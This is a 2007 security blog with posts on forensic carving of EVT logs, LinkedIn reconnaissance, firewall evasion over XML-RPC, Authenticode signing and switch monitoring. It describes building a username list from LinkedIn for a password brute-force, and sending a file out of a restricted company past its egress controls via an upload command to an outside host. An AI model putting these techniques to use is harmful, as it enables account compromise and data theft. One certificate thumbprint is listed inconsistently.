Recovering Windows EVT with Foremost

June 29, 2007

For my forensic needs I am definitely sticking with Linux as a platform. Besides the great TSK toolset, I can use foremost
for data carving ( extraction ). BTW, I read that foremost is now available on Windows as well.

I had an image from a Windows XP machine which was badly damaged and could not be mounted. I needed to recover the event logs ( the *.evt files ) from it. Since the logs are binary, a Unicode or ASCII search would not have turned up anything, so I used the foremost tool on Linux.

The hex signature of the evt file is :

\x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

Knowing this, I constructed a foremost config file telling the tool exactly how I wanted the data carved. With the following configuration in the /usr/local/etc/foremost.conf.evt config file:

evt y 512000 \x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

the tool will search for the signature and recover at most 512000 bytes, which should be enough to read the evt with a custom Python script or with fccu.evtreader.pl ( http://www.d-fence.be ).

So, the recovery goes like this:
1. Construct recovery command for foremost:

$ foremost -v -T -c /usr/local/etc/foremost.conf.evt -t all -i /z/image.dd

This will extract binary evt files ( like 00000000.evt ) from image.dd.

2. Run

$ fccu.evtreader.pl 00000000.evt

and get ASCII lines back for further processing.
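As an added example (not the post's own tooling; foremost does the carving there), here is a small Python carver that applies the same 16-byte signature and 512000-byte cap to an in-memory image, then decodes the 48-byte EVT file header of each hit so you can tell a real log from a chance match and see whether the log was dirty or wrapped when the machine went down. The sample image and its header values are constructed for the demonstration, and `carve_file` is a hypothetical helper that writes foremost-style 00000000.evt names.

```python
import os
import struct
import sys

# The 16-byte signature from the post: header size 0x30, the "LfLe" magic,
# major version 1 and minor version 1, all little-endian DWORDs.
EVT_SIGNATURE = b"\x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00"
MAX_CARVE = 512000      # the byte cap from the foremost.conf.evt line
HEADER_LEN = 48         # ELF_LOGFILE_HEADER is twelve little-endian DWORDs

HEADER_FIELDS = (
    "header_size", "signature", "major", "minor", "start_offset", "end_offset",
    "current_record", "oldest_record", "max_size", "flags", "retention",
    "end_header_size",
)
FLAG_DIRTY = 0x1        # ELF_LOGFILE_HEADER_DIRTY: header not flushed (log was open)
FLAG_WRAP = 0x2         # ELF_LOGFILE_HEADER_WRAP: records wrapped around the file


def parse_header(buf):
    """Decode a 48-byte EVT file header into a dict, or None if it is not sane."""
    if len(buf) < HEADER_LEN:
        return None
    hdr = dict(zip(HEADER_FIELDS, struct.unpack("<I4s10I", buf[:HEADER_LEN])))
    # Both size fields bracket the header and must read 48; this weeds out
    # chance 16-byte matches inside other data.
    if hdr["header_size"] != HEADER_LEN or hdr["end_header_size"] != HEADER_LEN:
        return None
    hdr["dirty"] = bool(hdr["flags"] & FLAG_DIRTY)
    hdr["wrapped"] = bool(hdr["flags"] & FLAG_WRAP)
    return hdr


def carve_evt(image, max_bytes=MAX_CARVE):
    """Return [(offset, header, data)] for every plausible EVT header in image.

    EVT has no footer, so like the foremost config each hit is cut at
    max_bytes, or earlier if the next valid header comes first.
    """
    offsets = []
    pos = image.find(EVT_SIGNATURE)
    while pos != -1:
        if parse_header(image[pos:pos + HEADER_LEN]) is not None:
            offsets.append(pos)
        pos = image.find(EVT_SIGNATURE, pos + 1)
    hits = []
    for i, off in enumerate(offsets):
        limit = offsets[i + 1] if i + 1 < len(offsets) else len(image)
        end = min(off + max_bytes, limit)
        hits.append((off, parse_header(image[off:off + HEADER_LEN]), image[off:end]))
    return hits


def carve_file(path, outdir=".", max_bytes=MAX_CARVE):
    """Hypothetical helper: carve an image file and write foremost-style names."""
    with open(path, "rb") as fh:
        image = fh.read()
    written = []
    for n, (off, hdr, data) in enumerate(carve_evt(image, max_bytes)):
        name = os.path.join(outdir, f"{n:08d}.evt")
        with open(name, "wb") as out:
            out.write(data)
        written.append((name, off, hdr["current_record"], hdr["dirty"]))
    return written


def build_header(start, end, current, oldest, max_size, flags):
    """Constructed header for the sample image; not taken from a real log."""
    return struct.pack("<I4s10I", HEADER_LEN, b"LfLe", 1, 1, start, end,
                       current, oldest, max_size, flags, 0, HEADER_LEN)


# Constructed "damaged image": filler, a clean empty log, more filler, a dirty
# wrapped log with 381 records, then a bare signature with a bogus trailer.
SAMPLE_IMAGE = (
    b"\x00" * 1000
    + build_header(48, 48, 1, 1, 524288, 0) + b"\xaa" * 4000
    + b"\xff" * 3000
    + build_header(48, 20000, 381, 17, 524288, FLAG_DIRTY | FLAG_WRAP) + b"\xbb" * 25000
    + EVT_SIGNATURE + b"\x00" * 32
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for name, off, next_rec, dirty in carve_file(sys.argv[1]):
            print(f"{name}: offset {off}, next record {next_rec}, dirty={dirty}")
    else:
        for off, hdr, data in carve_evt(SAMPLE_IMAGE):
            print(f"offset {off}: {len(data)} bytes, next record "
                  f"{hdr['current_record']}, dirty={hdr['dirty']}, wrapped={hdr['wrapped']}")
```

Run it with no arguments to see the two valid headers in the constructed image (the trailing bare signature is rejected because its end-of-header size field is not 48), or pass the path of a real image to get 00000000.evt style files in the current directory. A dirty flag on a carved log is normal for a machine that died with the log open, but it tells you the header's record counters may lag the records actually present.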

Harvesting Reconnaissance Info via Linked-in

June 10, 2007

Someone I haven't talked to for a long time sent me a linked-in ( http://www.linkedin.com ) request the other day, and I went to update my long-outstanding profile. For those who have not used Linked-in – it’s an online network of people you want to keep in contact with; and find/expand your relationships with people your contacts know.

At the time I was preparing to pen-test a company's PeopleSoft web interface to Accounts Payable/ Accounts Receivable stuff. Of course, there was no correlation between these 2 activities except for the fact that Linked-in made my recon phase of the test that much easier. This wonderful site allowed me to generate a dictionary of possible first and last names of people currently working for the company. Given the fact and some other clues, I was able to infer user login policy to the Website interface. :) All I had to do was search for current employees of the particular company. Forget Monster profiles ( who knows how updated they are ). Forget searching for emails on Google. Logging in to Linked-in and having at least one sufficiently connected peer in your network ( 500 references in my case ), I was able to find 145 people currently working for the company. Of them, 18 were execs and 34 were technical people with resumes reflecting technology they worked on at the company.

Needless to say the dictionary of first/last names was fed into a brute-forcer against the web interface I was testing. 20 minutes later I got “Password invalid” for a valid user…. Interestingly enough, the valid user turned out to be an HR guy who never changed his password.

I wonder if anyone had taken it further to do some social engineering stuff :) ?

Bypassing firewalls with XML-RPC

June 10, 2007

I know… Lots of people are talking about insecure webservices nowadays. Until recently I didn't have much to do with it. However, I was in one quite secure environment the other week, and had to transfer a utility of my own out of the company. I also needed to transfer a video of the utility in action outside.

A lot of “normal” ways of transferring data out of the company were already restricted, including ssh and mail attachments, and even USB and CDROMs were locked. So I really had to either print the source code and retype it later or come up with a way to transfer files reliably. Proxy servers did not allow access to the usual upload facilities like Rapidshare, etc. One option was to connect via port 80 somewhere and upload the file… The company allowed only POST and GET egress. Pain in the butt… :) or… good security… :) Unfortunately, visits to my home page were prohibited by Websense under the “Personal homepages” policy. Not much to do. So, thinking more about it, I decided to take down my home site and mount an XML-RPC service on port 80 instead. Tweaking things here and there, it looked promising. Here’s a client and server I wrote to finally copy binary/text files via my webservice. I based it on Twisted Python – great stuff.


dimas@moo ~/scripts/python/twisted $ ls -l ~/Desktop/video.wmv
-rw-r--r-- 1 dimas dimas 7732360 May 14 16:37 /home/dimas/Desktop/video.wmv

dimas@moo ~/scripts/python/twisted $ ./xmlrpc_client.py ~/Desktop/video.wmv 'http://externalsite:80'
[c]Preparing for service at: http://externalsite:80
[c]Connected to http://externalsite:80
[c]Uploading file /home/dimas/Desktop/video.wmv
[c]Client digest:1a0444dff540bd641d23d28e21288804e6fd0735
[s]Server digest:1a0444dff540bd641d23d28e21288804e6fd0735
[c]File upload status: UPLD_OK

It was a success. The XML-RPC calls went undetected ( or at least were not prevented ). Also, if anyone visits externalsite:80 they will not see the usual upload page… which is always better :) anyway.

Here is the code. I checksum the data with SHA-1, base64-encode it on one end and reverse it on the other.

XML-RPC twisted client

XML-RPC twisted server

So, really, how are people going to fix this? Unless they do some really intelligent packet inspection and know the business logic, it’s hard to do. XML-RPC clients/servers are mostly custom within organisations, and one needs to teach the parsing software the proper rules.
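One way to do the application-aware inspection the paragraph asks for, as an added example that is not the author's Twisted code: a Python check that parses an HTTP POST body as XML-RPC with the standard library and measures how many decoded bytes the call's parameters carry, whether as `<base64>` elements or as base64 text inside ordinary `<string>` parameters, which is how the post's client moves the file. The sample bodies, method names and the 64 KiB threshold are constructed assumptions for the demonstration.

```python
import base64
import binascii
import hashlib
import xmlrpc.client

# Decoded bytes per call above which the call is treated as a file transfer
# rather than a normal remote procedure call. Tune to the application; the
# 64 KiB figure is an assumption for this example.
UPLOAD_THRESHOLD = 64 * 1024


def _looks_like_base64(text):
    """True if text is non-trivially long and decodes strictly as base64."""
    if len(text) < 64 or len(text) % 4:
        return False
    try:
        base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def decoded_blob_bytes(value):
    """Bytes of binary payload carried by one XML-RPC parameter (recursive)."""
    if isinstance(value, xmlrpc.client.Binary):        # a <base64> element
        return len(value.data)
    if isinstance(value, str):                          # <string> holding base64 text
        text = value.strip()
        return len(base64.b64decode(text)) if _looks_like_base64(text) else 0
    if isinstance(value, (list, tuple)):
        return sum(decoded_blob_bytes(v) for v in value)
    if isinstance(value, dict):
        return sum(decoded_blob_bytes(v) for v in value.values())
    return 0


def inspect_call(body):
    """Return (method, decoded_payload_bytes) for an XML-RPC request body, else None."""
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:           # not XML-RPC at all, or a <fault> response
        return None
    return method, sum(decoded_blob_bytes(p) for p in params)


def flag_uploads(bodies, threshold=UPLOAD_THRESHOLD):
    """[(method, bytes)] for every body whose decoded payload exceeds threshold."""
    flagged = []
    for body in bodies:
        result = inspect_call(body)
        if result is not None and result[1] > threshold:
            flagged.append(result)
    return flagged


def build_request(method, *params):
    """Serialise a methodCall the way a client puts it into a POST body."""
    return xmlrpc.client.dumps(params, methodname=method).encode()


# Constructed sample POST bodies; none of this is captured traffic.
_video = b"\x37" * 102400          # stands in for the 7.7 MB video in the post
SAMPLE_BODIES = [
    build_request("system.listMethods"),
    build_request("ticket.create", "Printer jam", "floor 3"),
    # The post's scheme: base64 text plus a SHA-1 digest as plain string params.
    build_request("file.put", "video.wmv",
                  base64.b64encode(_video).decode(), hashlib.sha1(_video).hexdigest()),
    build_request("blob.store", xmlrpc.client.Binary(b"\x00" * 70000)),
    b"<html><body>not xml-rpc</body></html>",
]

if __name__ == "__main__":
    for method, size in flag_uploads(SAMPLE_BODIES):
        print(f"possible file transfer: {method} carried {size} decoded bytes")
```

The size of the decoded payload is the signal; base64 validity alone is weak, since any 64-character hex digest also decodes cleanly. A real deployment would run this on the proxy or in an ICAP hook, keyed on the POST body's content type, and would also count payload split across many small calls from the same client, which a per-call threshold does not catch.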

Local Certificate Authority for MS Authenticode

June 6, 2007

I needed a fast and scriptable way of signing local binaries. Those “tools” would be distributed around the department and had to be accepted and run by others. I looked at Microsoft MSH ( PowerShell ? ) to see if it could help, and it did…. The following procedure was rolled into a script and automated.

Prerequisites I needed

1. Install .Net Framework 2.0
2. Install the MSH Windows shell
3. Install .Net Development SDK

Note: in this example the SRVR ( W2k3 ) server is used as the local CA and ACCT as the admin account to run under.

Procedure I followed:

1. Login to SRVR as ACCT account
2. Start->Run : type msh

I. Make Certificate Authority ( only one time )

## Create Certificate Authority keypair and certificate
MSH> makecert -n "CN=Company Local CA2, O=CompanyBuild, C=US, S=Illinois, O=Company, OU=Chicago" -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine
Succeeded

## Check if it was created
MSH> get-childitem cert:\localmachine\root

Subject : CN=Company Local CA2, O=Company Build, C=US, S=Illinois, O=Company, OU=Chicago
Issuer : CN=Company Local CA2, O=Company Build, C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : FCD5D33001132C770CF0627424B1F21E9EECD6DD
FriendlyName :
NotBefore : 3/22/2007 3:11:15 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography.Oid, System.Security.Cryptography.Oid}

II. Make Certificate Signing Authority ( only one time )

## Create signing authority and sign its certificate with the local CA
MSH> makecert -pe -n "CN=Company Local CA2 Signing Validation, O=Company Build, C=US, S=Illinois OU=Chicago" -ss CF -a sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer

Succeeded

Note the missing comma between S=Illinois and OU=Chicago in that -n string: the store listing that follows shows the subject was parsed as S="Illinois OU=Chicago", so the OU never became a separate RDN.

## Check it was created
MSH> get-childitem cert:\currentuser\CF

Subject : CN=Company Local CA2 Signing Validation, O=Company Build, C=US, S="Illinois OU=Chicago"
Issuer : CN=Company Local CA2, O=Company Build, C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : E748B0B01AFA1B3CC27B268E7FEB2698D6FA6B95
FriendlyName :
NotBefore : 3/22/2007 3:19:02 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography.Oid, System.Security.Cryptography.Oid}

III. Sign a file ( every time )

## In case you have multiple CAs installed, select the one certificate you need ( array element )
MSH> $cert=(get-childitem cert:\currentuser\CF)[1]

## Sign EXE/CAB/DLL/MSH files
MSH> set-authenticodeSignature "c:\Tools\fport\Fport-2.0\fport.exe" $cert

SignerCertificate : [Subject]
CN=Company Local CA2 Signing Validation, O=Company Build, C=US, S="Illinois OU=Chicago"

[Issuer]
CN=Company Local CA2, O=Company Build, C=US, S=Illinois, O=Company, OU=Chicago

[Serial Number]
DB0F9C8A691755074AAF551F570DE4E5

[Not Before]
3/22/2007 3:19:02 PM

[Not After]
12/31/2039 5:59:59 PM

[Thumbprint]
E748B0B01AFF1B5FC27B268E7FEB2698D6FA6B95

TimeStamperCertificate :
Status : Valid
StatusMessage : Signature verified.
Path : C:\Tools\fport\Fport-2.0\fport.exe

IV. Test and distribute the signed file

(Old) Brocade switch performance monitoring

June 6, 2007

Why do I get old hardware … :) The Brocade 2800 16-port switch does not support ssh for management, and there’s no decent reporting. But it’s very affordable and solid for entry-level FC tweaking. It’s really not meant to support production anymore ( performance-wise ) :) But some people have no choice, and run Oracle on it. Here’s how I got to collecting performance stats from it and reporting them at as fine a granularity ( 15 sec ) as I could.

The cron entries:

### San switch 1
00,05,10,15,20,25,30,35,40,45,50,55 * * * * /usr/local/scripts/monitoring/BrocadePortPerf.pl --switch=10.4.15.202 --collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw1.log 2>&1

### San switch 2
00,05,10,15,20,25,30,35,40,45,50,55 * * * * /usr/local/scripts/monitoring/BrocadePortPerf.pl --switch=10.4.15.203 --collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw2.log 2>&1

### San port layout
00 6 * * * /usr/local/scripts/monitoring/wwn2port.pl --switch=10.4.15.202 --switch=10.4.15.203 >>/var/log/wwwn2port.pl.log 2>&1

##### Generate San Port Performance graphs
10 * * * * /usr/local/scripts/monitoring/generateAll4Day.sh >> /var/log/generateAll4Day.sh.log 2>&1

And the respective scripts:

Brocade port performance collector BrocadePortPerf.pl

Web stats generator GenPortStats.pl

WWN2Port converter wwn2port.pl

The web frontend is fed from the collected information, which looks like this:

epoch time|humandate|ip:port|stats 15 second interval|(M)aximum, (A)verage for the past interval

1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port6 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port1 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port9 | 0.01:0.01:0.25:0.01:0.03:0.26:0.08:0.26:0.03:0.34:0.02:0.27:0.27:0.00:0.00:0.02 | M=0.34, A=0.12
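As an added example (not the post's Perl scripts), here is a Python reader for the collector format shown above. It recomputes the M/A summary from the 16 samples so a clipped or hand-edited line is noticed rather than graphed, rejects lines with the wrong sample count, and aggregates peak and mean per switch port. The first three sample lines are the ones from the post; the two extra lines are constructed to show a mismatched summary and a truncated line.

```python
import re
from decimal import Decimal, ROUND_HALF_UP

SAMPLES_PER_LINE = 16   # 16 readings taken 15 seconds apart, per the format line
SUMMARY_RE = re.compile(r"^M=(?P<max>\d+\.\d+), A=(?P<avg>\d+\.\d+)$")


def parse_line(line):
    """Parse one collector line into a dict; raise ValueError if it is malformed."""
    fields = [f.strip() for f in line.split("|")]
    if len(fields) != 5:
        raise ValueError(f"expected 5 fields, got {len(fields)}")
    epoch, human, endpoint, samples, summary = fields
    switch, sep, port = endpoint.partition(":")
    if not sep:
        raise ValueError("third field is not ip:port")
    values = [Decimal(v) for v in samples.split(":")]
    if len(values) != SAMPLES_PER_LINE:
        raise ValueError(f"expected {SAMPLES_PER_LINE} samples, got {len(values)}")
    m = SUMMARY_RE.match(summary)
    if m is None:
        raise ValueError("bad M=/A= summary")
    calc_max = max(values)
    calc_avg = sum(values) / SAMPLES_PER_LINE
    # The collector prints its own M/A; recompute them so a clipped or edited
    # line (or a collector bug) is caught instead of silently feeding the graphs.
    consistent = (
        calc_max == Decimal(m["max"])
        and calc_avg.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP) == Decimal(m["avg"])
    )
    return {"epoch": int(epoch), "when": human, "switch": switch, "port": port,
            "samples": values, "max": calc_max, "avg": calc_avg, "consistent": consistent}


def load_records(text):
    """Split a log dump into (records, rejects); rejects are (line, reason) pairs."""
    records, rejects = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            records.append(parse_line(line))
        except (ValueError, ArithmeticError) as exc:   # Decimal errors are ArithmeticError
            rejects.append((line, str(exc)))
    return records, rejects


def per_port_summary(records):
    """Peak and mean per switch:port over every record whose M/A checked out."""
    acc = {}
    for r in records:
        if not r["consistent"]:
            continue
        key = f"{r['switch']}:{r['port']}"
        peak, total, n = acc.get(key, (Decimal(0), Decimal(0), 0))
        acc[key] = (max(peak, r["max"]), total + sum(r["samples"]), n + len(r["samples"]))
    return {k: (peak, total / n) for k, (peak, total, n) in acc.items()}


def busiest_port(records):
    """The switch:port with the highest peak, or None if nothing parsed cleanly."""
    summary = per_port_summary(records)
    return max(summary, key=lambda k: summary[k][0]) if summary else None


# The first three lines are the ones shown in the post; the last two are
# constructed: one whose M= does not match its samples, one that was clipped.
SAMPLE_LOG = """\
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port6 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port1 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port9 | 0.01:0.01:0.25:0.01:0.03:0.26:0.08:0.26:0.03:0.34:0.02:0.27:0.27:0.00:0.00:0.02 | M=0.34, A=0.12
1171087218 | 00:00:18, Sat Feb 10, 2007 | 10.4.15.203:Port9 | 0.50:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.20, A=0.03
1171087218 | 00:00:18, Sat Feb 10, 2007 | 10.4.15.203:Port1 | 0.00:0.00 | M=0.00, A=0.00
"""

if __name__ == "__main__":
    recs, bad = load_records(SAMPLE_LOG)
    for key, (peak, mean) in sorted(per_port_summary(recs).items()):
        print(f"{key}: peak {peak} mean {mean:.4f}")
    for line, why in bad:
        print(f"rejected ({why}): {line[:60]}...")
    print("busiest:", busiest_port(recs))
```

Decimal is used rather than float so the recomputed average of the Port9 line comes out as exactly 0.11625 and rounds half-up to the collector's 0.12; with binary floats that comparison would depend on summation order. Inconsistent records are kept in the parsed list (so they can be reported) but excluded from the per-port aggregates.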

The web page drills down Date -> IP -> Port -> Max/Average, like so:

Brocade switch port performance

Avoiding Netsend broadcast

June 6, 2007

Here’s a small utility to send net send messages to recipients by IP block, avoiding broadcast/multicast.
Usage: netsend.pl --iptype={subnet|address} [--verbose] <address|subnet>
Please fill subnet in form of CIDR : X.X.X.X/XX

At the end of the run it gives a summary of IPs delivered/failed. I created it to overcome one problem in an environment where messages to users were sent via net send ( manually ! ).

Since I was at it, a CGI interface is included as well.

As I think of it, this may be used for footprinting workstations that are able to receive the messages. I should try that next time :)

P.S. I cannot upload a tarball :( So I have scanned 3 files:

Netsend.pl ( netsend.pl )

Netsend.cgi ( netsend.cgi ) and

Netsend.lgr ( netsend.lgr ) in PDF format.

